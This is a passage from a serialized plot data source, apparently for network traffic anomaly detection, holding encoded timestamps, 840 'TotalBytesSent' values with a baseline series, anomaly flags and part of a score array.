AAGC8iK12QgAASCuMrXZCAAAwmo+tdkIAABgJk612QgAAAHiWrXZCAADo5pmtdkIAANBVna12QgAAuMSgrXZCAACgM6StdkIAAIiip612QgAAcBGrrXZCAABYgK6tdkIAAEDvsa12QgAAKF61rXZCAAAQzbitdkIAAPg7vK12QgAA4Kq/rXZCAADIGcOtdkIAALCIxq12QgAAmPfJrXZCAACAZs2tdkIAAGjV0K12QgAAUETUrXZCAAA4s9etdkIAACAi2612QgAACJHerXZCAADw/+GtdkIAANhu5a12QgAAwN3orXZCAACoTOytdkIAAJC77612QgAAeCrzrXZCAABgmfatdkIAAEgI+q12QgAAMHf9rXZCAAAY5gCudkIAAABVBK52QgAA6MMHrnZCAADQMguudkIAALihDq52QgAAoBASrnZCAACIfxWudkIAAHDuGK52QgAAWF0crnZCAABAzB+udkIAACg7I652QgAAEKomrnZCAAD4GCqudkIAAOCHLa52QgAAyPYwrnZCAACwZTSudkIAAJjUN652QgAAgEM7rnZCAABosj6udkIAAFAhQq52QgAAOJBFrnZCAAAg/0iudkIAAAhuTK52QgAA8NxPrnZCAADYS1OudkIAAMC6Vq52QgAAqClarnZCAACQmF2udkIAAHgHYa52QgAAYHZkrnZCAABI5WeudkIAADBUa652QgAAGMNurnZCAAAAMnKudkIAAOigda52QgAA0A95rnZCAAC4fnyudkIAAKDtf652QgAAiFyDrnZCAABwy4audkIAAFg6iq52QgAAQKmNrnZCAAAoGJGudkIAABCHlK52QgAA+PWXrnZCAADgZJuudkIAAMjTnq52QgAAsEKirnZCAACYsaWudkIAAIAgqa52QgAAaI+srnZCAABQ/q+udkIAADhts652QgAAINy2rnZCAAAIS7qudkIAAPC5va52QgAA2CjBrnZCAADAl8SudkIAAKgGyK52QgAAkHXLrnZCAAB45M6udkIAAGBT0q52QgAASMLVrnZCAAAwMdmudkIAABig3K52QgAAAA/grnZCAADofeOudkIAANDs5q52QgAAuFvqrnZCAACgyu2udkIAAIg58a52QgAAcKj0rnZCAABYF/iudkIAAECG+652QgAAKPX+rnZCAAAQZAKvdkIAAPjSBa92QgAA4EE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\",\"dtype\":\"float64\",\"shape\":[840]},\"TotalBytesSent\":[873713587,882187669,852506841,898793650,891598085,893022551,922677236,856663011,830763825,855292297,867265088,783423911,797876828,790012871,852519704,801772685,807320821,811995775,857108417,668803434,644214662,716435846,718165305,846441590,913851950,909281093,910496479,860491701,907134623,951830968,863445775,883803886,947731570,897928218,862303611,891357428,874557665,802427120,869716161,851558231,906453909,843625312,807469579,695427997,643948011,677938461,666457868,890567174,920136656,864647530,865802529,937646970,918357380,889610303,913645805,887186534,965532850,825807779,903819076,827999022,916732278,903529290,869875766,877268278,901985353,820902488,839550728,697140933,725116765,718391605,734634539,961618771,973519876,931452710,936782632,902828719,956018750,901050381,986348136,888182919,895773023,860244868,894638180,932630230,877076050,904708616,885212895,928834714,882928145,897273726,845388269,730597647,733994909,696100730,677795812,944003798,940124451,903070877,966821399,928572732,968103682,942345100,918154112,908724455,969661489,869552513,928906452,858754943,852800036,956027685,899862034,914327713,868670704,863683195,905245396,698524204,751378763,788098393,718327017,457637899,407128034,427965408,416582611,405735621,475934081,391911247,382779518,418150700,439492547,344212429,385151272,402634638,348130418,330143017,412007535,354978767,383963655,426783985,402920595,216671778,186952988,256555183,237640219,459615281,450916734,439791726,407339745,460514032,473271204,42271963,452867549,433833905,412908587,399529976,351788448,357793541,420058661,388618694,344244340,384677308,350548288,433051287,434604199,227336212,181142300,225420990,242379095,1022669703,953364734,1033085221,969714599,1013729943,981345529,1037288750,991165062,984493550,978367044,938879683,955831823,905906975,957606717,929509010,1002659157,935735110,930332470,956107825,984858191,855085656,753446631,806497013,799747641,1026442326,1077848994,1042074279,989569304,1057453529,1057338096,1067745732,1039937078,634395781,1038853034,988661138,971145433,1020524701,1023040605,1026067148,974899180,925481646,1008014066,978065792,976248064,788591993,819890342,776408096,826110086,1034936595,1039212114,1022464025,1075642770,1055035913,1061634536,1076072442,1061904372,1051809129,1055544997,1039038521,946540104,982693333,1040505474,963020903,1017382900,974943158,986877436,977686629,946411386,818997628,799954180,862299582,836341534,1025090070,1007907120,1027324682,1016950649,1090135061,1066631292,1087552149,1011146902,1096276461,1053690335,1026041317,995544290,964045673,1007207382,976018535,1044530213,1056525176,1009998583,1020296930,996836955,858490388,830213157,845167877,837203412,1100015423,1074240368,1085046504,1119540427,1066062542,1111993335,1074743022,1075393902,1096429594,1104942722,1043375756,1004789142,1009115136,1036882213,998556234,1061527144,1059037422,982935955,1070078489,1074805675,823993813,845965247,908350645,909155856,594596972,588339826,513974580,498608477,564220831,526136510,537404241,503702057,562529456,565679688,446033781,493641472,916767394,467545424,466436663,459461022,486413184,538919515,494288347,503115084,338429270,376607397,335536198,305752110,579716989,607277895,580925641,591887341,535053510,542852243,600980027,572841825,610227565,597944660,478582894,533450021,523528503,483109880,575159745,542252387,545441292,575681208,566276013,572591706,353152221,351089795,402680601,398099696,1124558087,1094578207,1149602244,1127141868,1188500821,1171529151,1137436272,1134543931,1102054311,1085571380,1079571807,1085991361,1056982073,1133881950,1064259706,1083322471,1110532757,1116891783,1069608690,1138721940,891550671,930699055,913962202,880548252,1163276194,1118538836,1134609747,1197648313,1140866762,1124279760,1202915026,1156873076,1189829422,1190081828,1089603867,1150060587,1067572234,1077762137,1101599618,1125614650,1054136082,1160099162,1097202834,1140124125,999404394,930962307,984346459,989561872,1212679768,1143875331,1175140739,1136172485,1216091392,1166238768,1213483016,1141226357,1142413009,1202291677,1096804116,1103237642,1136332093,1078214113,1082330918,1105565630,1555286702,1170305747,1081316124,1105199753,921977750,983638609,994542648,963769124,1181536839,1201880958,1221525336,1183995519,1230322064,1155522276,1188888461,1145193164,1155701298,1188033929,1085635585,1119451105,1174983532,1189287942,1104109113,1112397263,1187541501,1132189425,1176740195,1193123726,997973374,987071459,1016780205,1022792246,1259584702,1171617419,1201434219,1197268131,1246202606,1193402296,1179520250,1229313145,1242054018,1213590384,1211392931,1210114874,1143940643,1125394273,1108593833,1155662210,1163561397,1163391090,1158459579,1146162232,1012664439,1006936386,1032638042,964323187,726832364,673815250,673077290,683083834,641410712,728453985,641745207,704815291,726998848,657695371,652574108,613671163,603748816,638653988,662712107,597580224,605047075,662654036,608539632,688872417,514920636,447879593,510485297,484271754,676461315,660568258,702440857,675871159,725286517,670973900,727885782,744687972,675085296,651879749,665241172,627295101,683310114,607687695,667111982,646866052,655118217,614153533,703929185,687145906,491031685,475837204,527835918,536374191,1233566650,1302272008,1289104217,1281107991,1278953301,1232111868,1294651802,1240461427,1305202257,1296015157,1265505042,1203512594,1255884232,1231314521,1186407921,1166835959,1205765612,1166356313,1223852614,1269667059,1041230333,1108569577,1032000916,1055812151,1234663961,1293752411,1312405451,1272792567,1244937177,1228548121,1246364826,1327024928,1243726839,1246608903,1266850172,1250452305,1236222417,1261777865,1241712737,1188691842,1290406309,1237931166,1286266734,1254724526,1024325551,1129096497,1094744542,1106153922,1271645012,1347794452,1351655119,1334942686,1251176674,1269615109,1344451748,1314975114,1337578152,1348381350,1299125075,1261105761,1295117140,1275566823,1218600630,1205956592,1228909763,1280308251,1293029712,1209380432,1119365150,1060920766,1061436742,1094057836,1338597036,1313165433,1363214977,1291210639,1301482144,1298243874,1324592383,1346187572,1346602309,1307023171,1246832320,1320019656,1322110891,1289406441,1245116093,1233689715,1246103258,1282225691,1324849514,1264425198,1085445814,1103826656,1135021543,1093951930,1768911488,1344644367,1325119826,1352683245,1388311605,1386178294,1314885144,1390097286,1340372349,1308315998,1248477459,1307770976,1277794700,1301026627,1275879844,1337627540,1266847511,1250826284,1250775463,1303065742,1083159258,1075790124,1124244637,1142869516,844634233,831852994,858119325,756699030,859346504,782955826,766149662,820109225,843569927,862042352,772626268,741265353,752637777,711080800,787329634,760437876,775861416,707501549,786003450,782503059,651765460,613346276,641089364,588356946,825822420,820488600,839810018,816681132,806727645,862121762,850428593,833831322,837988090,882639328,812175783,788758153,736528580,763329213,782038749,792206615,812923462,737361821,808975990,806454559,654882781,595837479,615062385,605973282,1368926432,1355926496,1348926724,1337306282,1410566043,1341735073,1343795224,1435220844,1379367502,1384310206,1365457344,1360152030,1366919111,1376774721,1338677133,1379408603,1326759966,1337344137,1365622686,1390260265,1162133464,1191190594,1172019258,1209471254,1418034087,1363742046,1425275938,1432759288,1380549618,1398671177,1405068973,1385686319,1409991781,1447319641,1380666340,1333216667,1322760361,1398705231,1315549876,1356737170,1394306054,1322876966,1353514970,1333873537,1226651039,1255761136,1231513058,1168746496,1416639066,1427112735,1461381214,1412016648,1447531904,1477902019,1394862023,1477340485,1483015065,1443581624,1404994511,1326704915,1405705118,1432086031,1349510015,1372709257,1426258965,1400670563,1393785274,1360268291,1227162238,1260832816,1263051135,1269304066,1442954939,1495282173,1489786658,1448466267,1480962739,1398602833,1469105751,1468864803,1412196168,1400145473,1439154948,1441755515,1451670670,1414405345,1361733906,1389770777,1389767204,1357535607,1412196256,1361244164,1214116379,1218696527,1236011876,1258844480,1471186871,1407500147,1505744090,1475423157,1480762935,1503614110,1496402547,1417036285,1437493594,1493592827,1436181558,1441047945,993152841,1453223308,1373485407,1471798370,1419431171,1453799427,1372937500,1379938036,1284457376,1287902888,1236144771,1261400942,960208787,939095822,930978685,944830098,925097517,986308242,919493841,927218360,971499707,955771283,834582332,852630670,874504602,914012315,834761544,908744348,853162780,922265182,859919693,930111090,737693868,722223752,758772577,706415711,994897470,974844971,916462999,965722723,913345256,900491348,917100812,905215807,910648863,1008418310,900965862,870174355,876299048,878786944,874525847,953351422,961309357,910212834,913189663,946670363,754488773,762510726,746115005,744582340,1469756566],\"anomalies\":[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,-1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,-1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,-1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],\"baseline\":[782728212,838492449,816772273,878871426,862639955,829287276,827135135,795385715,779642984,774383611,781543365,753274276,830914353,762032309,781835274,809785760,816884986,770342093,840195542,593764473,633653057,617656404,584982654,868450796,824453638,841264748,905043514,849002163,833155361,912530827,867229077,900925622,901918228,802180467,863377387,781629234,792559337,817137018,841892249,771153881,877857161,815701033,859362524,719382993,651681106,705805457,711761070,935619166,867554929,899560537,861332483,941991590,892879165,940863613,869347154,871274006,931892874,827145513,834319239,868153889,810776109,815633114,839608026,963692359,905828543,817579119,842202948,659721145,722122204,733766443,703733119,922241034,943325352,963709930,926920313,973987058,899927470,934033855,891078758,902327091,935399922,833741778,868297498,924570125,939614735,855176106,864204455,940088893,885477017,930767987,947891718,753481566,743319851,773768796,780521037,1018053693,930826610,961383610,957957722,1007632396,955572286,942430440,992963535,1006444608,978721174,977263921,976726063,776466525,893485862,877425622,925234199,933873586,934443479,930252167,918695020,785937427,780949574,807391430,739816775,503066152,450789237,450791477,461538221,420605299,508388772,422420194,486230478,509154234,440590957,436209894,398047149,537753963,424510374,449308692,384917009,393124060,451471221,398097017,479170002,305958421,239657577,303003481,277530138,470459899,455307042,497919841,472090343,522245900,468673483,526325565,543867955,475005479,452540132,466641755,429435883,486191096,411308877,471473364,451967634,460959999,420735515,511251366,495208287,299834266,285379985,338118899,347397372,1045330030,907081787,962846024,941125848,1003225001,986993531,953640852,951488710,919739290,903996559,898737186,905896940,877627852,955267929,886385884,906188849,934139335,941238561,894695668,964549118,718118049,758006632,742009979,709336229,992804371,948807213,965618324,1029397090,973355738,957508936,1036884402,991582652,1025279198,1026271804,926534042,987730962,905982809,916912912,941490593,966245825,895507457,1002210736,940054608,983716099,843736568,776034681,830159033,836114646,1059972741,991908504,1023914112,985686058,1066345165,1017232741,1065217189,993700729,995627581,1056246449,951499088,958672814,992507465,935129685,939986689,963961601,1088045934,1030182118,941932695,966556524,784074720,846475779,858120018,828086694,1046594609,1067678928,1088063506,1051273888,1098340633,1024281045,1058387430,1015432333,1026680667,1059753498,958095353,992651073,1048923700,1063968310,979529681,988558031,1064442469,1009830592,1055121562,1072245293,877835141,867673426,898122372,904874613,1142407268,1055180185,1085737185,1082311297,1131985972,1079925862,1066784015,1117317110,1130798183,1103074749,1101617496,1101079639,900820101,1017839437,1001779197,1049587774,1058227161,1058797054,1054605743,1043048596,910291002,905303149,931745005,864170350,627419727,575142813,575145053,585891796,544958874,632742347,546773769,610584053,633507810,564944533,560563469,522400724,662107538,548863949,573662268,509270585,517477635,575824796,522450592,603523577,430311996,364011153,427357057,401883713,594813474,579660617,622273416,596443918,646599476,593027059,650679140,668221530,599359054,576893707,590995330,553789459,610544672,535662452,595826939,576321209,585313574,545089090,635604942,619561863,424187841,409733560,462472474,471750947,1169683606,1031435363,1087199599,1065479423,1127578576,1111347106,1077994427,1075842286,1044092866,1028350134,1023090761,1030250515,1001981427,1079621504,1010739460,1030542425,1058492910,1065592136,1019049243,1088902693,842471624,882360208,866363555,833689804,1117157946,1073160788,1089971899,1153750665,1097709314,1081862512,1161237977,1115936227,1149632773,1150625379,1050887618,1112084538,1030336384,1041266487,1065844168,1090599400,1019861032,1126564312,1064408184,1108069674,968090143,900388256,954512608,960468221,1184326317,1116262080,1148267687,1110039633,1190698740,1141586316,1189570764,1118054305,1119981157,1180600024,1075852663,1083026389,1116861040,1059483260,1064340265,1088315177,1212399509,1154535693,1066286270,1090910099,908428296,970829355,982473593,952440269,1170948184,1192032503,1212417081,1175627464,1222694209,1148634620,1182741005,1139785908,1151034242,1184107073,1082448929,1117004649,1173277275,1188321885,1103883256,1112911606,1188796044,1134184168,1179475138,1196598868,1002188716,992027001,1022475947,1029228188,1266760844,1179533761,1210090760,1206664872,1256339547,1204279437,1191137591,1241670686,1255151758,1227428324,1225971071,1225433214,1025173676,1142193013,1126132773,1173941349,1182580736,1183150629,1178959318,1167402171,1034644578,1029656725,1056098580,988523925,751773302,699496388,699498628,710245372,669312450,757095922,671127344,734937628,757861385,689298108,684917045,646754300,786461113,673217524,698015843,633624160,641831211,700178372,646804167,727877152,554665571,488364728,551710632,526237289,719167050,704014192,746626991,720797493,770953051,717380634,775032716,792575106,723712629,701247282,715348905,678143034,734898247,660016028,720180515,700674784,709667149,669442665,759958517,743915438,548541417,534087136,586826049,596104522,1294037181,1155788938,1211553175,1189832999,1251932151,1235700681,1202348002,1200195861,1168446441,1152703710,1147444337,1154604090,1126335002,1203975079,1135093035,1154896000,1182846486,1189945712,1143402818,1213256268,966825199,1006713783,990717130,958043380,1241511522,1197514363,1214325474,1278104240,1222062889,1206216087,1285591553,1240289803,1273986348,1274978954,1175241193,1236438113,1154689960,1165620063,1190197743,1214952975,1144214607,1250917887,1188761759,1232423250,1092443719,1024741831,1078866183,1084821796,1308679892,1240615655,1272621263,1234393209,1315052315,1265939891,1313924339,1242407880,1244334732,1304953600,1200206239,1207379964,1241214615,1183836835,1188693840,1212668752,1336753085,1278889269,1190639845,1215263674,1032781871,1095182930,1106827169,1076793845,1295301759,1316386078,1336770656,1299981039,1347047784,1272988196,1307094581,1264139483,1275387817,1308460648,1206802504,1241358224,1297630851,1312675461,1228236831,1237265181,1313149619,1258537743,1303828713,1320952444,1126542292,1116380576,1146829522,1153581763,1391114419,1303887336,1334444336,1331018448,1380693122,1328633012,1315491166,1366024261,1379505334,1351781900,1350324646,1349786789,1149527251,1266546588,1250486348,1298294925,1306934312,1307504204,1303312893,1291755746,1158998153,1154010300,1180452156,1112877501,876126877,823849963,823852203,834598947,793666025,881449498,795480920,859291203,882214960,813651683,809270620,771107875,910814689,797571100,822369418,757977735,766184786,824531947,771157743,852230728,679019146,612718303,676064207,650590864,843520625,828367768,870980567,845151068,895306626,841734209,899386291,916928681,848066205,825600858,839702480,802496609,859251822,784369603,844534090,825028360,834020725,793796240,884312092,868269013,672894992,658440711,711179625,720458097,1418390756,1280142513,1335906750,1314186574,1376285727,1360054257,1326701577,1324549436,1292800016,1277057285,1271797912,1278957666,1250688578,1328328654,1259446610,1279249575,1307200061,1314299287,1267756394,1337609844,1091178774,1131067358,1115070705,1082396955,1365865097,1321867939,1338679050,1402457815,1346416464,1330569662,1409945128,1364643378,1398339924,1399332529,1299594768,1360791688,1279043535,1289973638,1314551319,1339306551,1268568182,1375271462,1313115334,1356776825,1216797294,1149095407,1203219759,1209175371,1433033467,1364969230,1396974838,1358746784,1439405891,1390293467,1438277914,1366761455,1368688307,1429307175,1324559814,1331733540,1365568191,1308190410,1313047415,1337022327,1461106660,1403242844,1314993421,1339617249,1157135446,1219536505,1231180744,1201147420,1419655335,1440739654,1461124231,1424334614,1471401359,1397341771,1431448156,1388493059,1399741393,1432814223,1331156079,1365711799,1421984426,1437029036,1352590407,1361618757,1437503194,1382891318,1428182288,1445306019,1250895867,1240734152,1271183098,1277935338,1515467994,1428240911,1458797911,1455372023,1505046698,1452986587,1439844741,1490377836,1503858909,1476135475,1474678222,1474140365,1273880826,1390900163,1374839923,1422648500,1431287887,1431857780,1427666469,1416109321,1283351728,1278363875,1304805731,1237231076,1000480453,948203539,948205778,958952522,918019600,1005803073,919834495,983644779,1006568536,938005258,933624195,895461450,1035168264,921924675,946722994,882331310,890538361,948885522,895511318,976584303,803372722,737071879,800417782,774944439,967874200,952721343,995334142,969504644,1019660202,966087784,1023739866,1041282256,972419780,949954433,964056056,926850185,983605397,908723178,968887665,949381935,958374300,918149816,1008665668,992622588,797248567,782794286,835533200,844811673,1542744332],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372,373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,420,421,422,423,424,425,426,427,428,429,430,431,432,433,434,435,436,437,438,439,440,441,442,443,444,445,446,447,448,449,450,451,452,453,454,455,456,457,458,459,460,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,476,477,478,479,480,481,482,483,484,485,486,487,488,489,490,491,492,493,494,495,496,497,498,499,500,501,502,503,504,505,506,507,508,509,510,511,512,513,514,515,516,517,518,519,520,521,522,523,524,525,526,527,528,529,530,531,532,533,534,535,536,537,538,539,540,541,542,543,544,545,546,547,548,549,550,551,552,553,554,555,556,557,558,559,560,561,562,563,564,565,566,567,568,569,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,595,596,597,598,599,600,601,602,603,604,605,606,607,608,609,610,611,612,613,614,615,616,617,618,619,620,621,622,623,624,625,626,627,628,629,630,631,632,633,634,635,636,637,638,639,640,641,642,643,644,645,646,647,648,649,650,651,652,653,654,655,656,657,658,659,660,661,662,663,664,665,666,667,668,669,670,671,672,673,674,675,676,677,678,679,680,681,682,683,684,685,686,687,688,689,690,691,692,693,694,695,696,697,698,699,700,701,702,703,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,731,732,733,734,735,736,737,738,739,740,741,742,743,744,745,746,747,748,749,750,751,752,753,754,755,756,757,758,759,760,761,762,763,764,765,766,767,768,769,770,771,772,773,774,775,776,777,778,779,780,781,782,783,784,785,786,787,788,789,790,791,792,793,794,795,796,797,798,799,800,801,802,803,804,805,806,807,808,809,810,811,812,813,814,815,816,817,818,819,820,821,822,823,824,825,826,827,828,829,830,831,832,833,834,835,836,837,838,839],\"score\":{\"__ndarray__\":\"ZcNtHnTFzD8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAG/ECYbPF0z8AAAAAAAAAAAAAAAAAAAAACefnhT7Koz8h3L4CpFPAPwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAArjQbuGWZ1z8WhHc9KBHwPwAAAAAAAAAA9wwmQOMEyT8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAY/jFbu8D1D8AAAAAAAAAABfxjRlgReI//UoD40EYrj8AAAAAAAAAAAAAAAAAAAAAktQRAoAKnj8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA